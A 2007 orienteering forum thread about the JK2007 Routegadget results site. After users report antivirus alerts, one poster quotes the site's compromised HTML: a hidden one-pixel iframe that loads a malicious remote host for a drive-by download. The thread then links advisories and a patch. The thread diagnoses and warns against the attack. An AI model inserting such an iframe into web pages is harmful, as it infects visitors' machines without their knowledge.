Nopesport

[Simon E]

JK2007 sprint race is now available on Routegadget at http://www.jk2007.routegadget.co.uk

I'll get the other days up as soon as possible.

Simon

[Nails]

some goit has drawn my route and done it completely wrong.... how do i delete a route that has already been entered?

[distracted]

think you have to contact the site admin to delete it, can't do it yourself...

[Simon E]

Maps and courses from Day 3 (Sunday) now up.

See http://www.jk2007.routegadget.co.uk for details.

[Paul Frost]

Nails
Either Simon E or myself can delete the route, which one is it?

[Nails]

Cheers Paul -Simon has done it.

[Simon E]

Nails
Either Simon E or myself can delete the route, which one is it?

It's OK, I've done it already. Any Nails route you see now should be the real thing!

[distracted]

drew my sprint route yesterday and it's disappeared, as have others (like Oystein's) it seems...

[PeteL]

WARNING - Virus Alert

I just logged onto the JK2007 routegadget site and my Symantec Software spotted a virus - didn't get which one but beware folks...

[Paul Frost]

PeteL

I can't see how you got a virus alert. I run Symantec and I get nothing.
Are you sure it's not a firewall alert, as the Java applet that RG uses can trigger those.

Sometimes these software firewalls/security suites are more trouble than their worth. Check your configuration.

If you or anyone else can give me details of the virus alert I will investigate, but no one else has ever commented about it.

[ifor]

I got somthing as well, using Sophos anti-virus stuff at work. I don't know the state of play, I was told to unplug myself from the network and go and find the IT people... None in the building so I will have to see tommorow when I get in.

I will let you know what happens tomorrow morning...

Ifor

[Rich R]

It's a Mal Virus as a temporary internet file. Using Sophos at work I have deleted it from quarentine. It's not from the route gadget site though its from the JK website at this address:

http://www.jk2007.routegadget.co.uk/

[Jethro]

I am still getting a virus warning connecting directly to the routgadget site, not going via the JK site.

[Ed]

Looking at the html source of routegadget.co.uk (checked jk2007 and main site), it looks like it's all been hacked:

Code: Select all

<head>
<iframe src='http://traf.paycash.cc/traf/?trash' width='1' height='1' frameborder='0'></iframe>
<head>

that'll be what's triggering the virus warnings. whether it's a virus or a web-bug is hard to tell - the aim seems to be to load a bit of javascript from shojacash.ws/load, but no idea what that script's trying to do.

Update:

it looks like it's a drive-by download attempt exploiting problems with Microsoft's animated cursors, as was recently found on the Asus webpages.

Reports of the problems:
http://isc2.sans.org/diary.html?storyid=1948
http://www.theregister.co.uk/2007/04/06 ... e_viruses/
http://glengamoi.com/forums/permalink/1 ... hread.aspx (in German)

Microsoft emergency patch for this problem released on 3rd April (if your machine does automatic Windows updates then you'll have got this already):
http://www.microsoft.com/technet/securi ... 7-017.mspx

Anyone running Internet Explorer who hasn't done a Windows Update since last Tuesday (when Microsoft released a patch for this exploit) may well have just got a nasty infection: I'd recommend a serious batch of virus-scanning, spyware-scanning and not using Internet Explorer (or Windows, if you can get away with it!)

[Simon]

I just sent an e-mail, to Paul, with a similar comment to Ed's. The iframe Ed highlights in turn calls another one. This second iframe calls a javascript function.

Similar code appears on quite a few *.routegadget.co.uk pages.